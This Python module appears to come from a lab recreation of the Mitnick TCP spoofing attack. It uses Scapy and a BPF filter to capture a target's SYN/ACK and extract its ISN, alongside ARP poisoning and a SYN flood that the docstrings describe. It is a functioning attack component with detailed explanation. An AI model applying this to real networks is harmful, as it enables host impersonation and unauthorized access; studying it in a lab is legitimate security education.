"""
sniffer.py — ISN Capture via Scapy

Role in the attack: After we send a forged SYN (pretending to be 10.0.2.30),
the target (10.0.2.20) replies with SYN/ACK containing its Initial Sequence
Number (ISN). That ISN is randomly generated by the target's kernel — we cannot
predict it. But because ARP poisoning redirects the target's traffic through us,
the SYN/ACK physically arrives at our NIC. We capture it here and extract the
ISN so we can compute the exact ACK number required to complete the handshake.

In the original 1994 Mitnick attack, ISN *prediction* was used because the
systems involved generated sequential, guessable ISNs. Modern kernels use
cryptographically random ISNs (RFC 6528), so interception via MITM is the only
viable approach in a LAN context.

Why pass filter= to scapy.sniff() instead of using lfilter=?
scapy.sniff(filter="...") compiles the expression into BPF bytecode and pushes
it down into the Linux kernel before any packet crosses the kernel/userspace
boundary. The SYN flood running in parallel produces thousands of packets per
second; BPF discards all of them inside the kernel, so Python never allocates a
single object for them. Using lfilter= (a Python callback) would instead copy
every flood packet into userspace and run a Python function on each one — under
heavy load the socket receive buffer fills up and the kernel starts dropping
packets before Python can drain it, risking loss of the one SYN/ACK we need.
"""

from scapy.all import sniff, TCP


def sniff_for_syn_ack(target_ip, server_ip, client_port, interface="eth0", timeout=10):
    """
    Block until a SYN/ACK from target_ip is seen on the wire, then return its ISN.

    The BPF filter is deliberately narrow:
      src host <target>      — only packets originating from the victim
      dst host <server>      — destined to the IP we are impersonating
      tcp port <client_port> — on the exact source port of our forged SYN
      tcp flags SYN+ACK      — must have both SYN and ACK set (rules out plain
                               SYN or ACK-only packets that match the other terms)

    The bit-mask idiom & (tcp-syn|tcp-ack) == (tcp-syn|tcp-ack) means: "both
    bits must be 1, but I don't care about RST, FIN, PSH, or URG." A simpler
    == (tcp-syn|tcp-ack) would additionally require the other four bits to be 0,
    which is unnecessarily strict.
    """
    print("--- Sniffing for SYN/ACK using Scapy ---")

    filter_str = (
        f"src host {target_ip} and dst host {server_ip} "
        f"and tcp port {client_port} "
        f"and (tcp[tcpflags] & (tcp-syn|tcp-ack)) == (tcp-syn|tcp-ack)"
    )

    print(f"[+] Sniffing with BPF filter: \"{filter_str}\"")

    try:
        # count=1  — stop after the first matching packet; we only need one ISN.
        # store=1  — keep the packet in memory so we can read TCP.seq below.
        # timeout  — give up if nothing matches within this many seconds.
        # filter   — compiled to BPF in the kernel; flood packets never reach Python.
        packets = sniff(
            iface=interface,
            filter=filter_str,
            count=1,
            timeout=timeout,
        )

        if not packets:
            print("\n[-] Sniffer timed out. No matching SYN/ACK packet was captured.")
            return None

        # Scapy already parsed the packet; no regex needed.
        # TCP.seq on the SYN/ACK is the target's ISN.
        target_isn = packets[0][TCP].seq
        print(f"\n[+] Captured SYN/ACK packet. Target's ISN is: {target_isn}")
        return target_isn

    except Exception as e:
        print(f"An error occurred during sniffing: {e}")
        return None
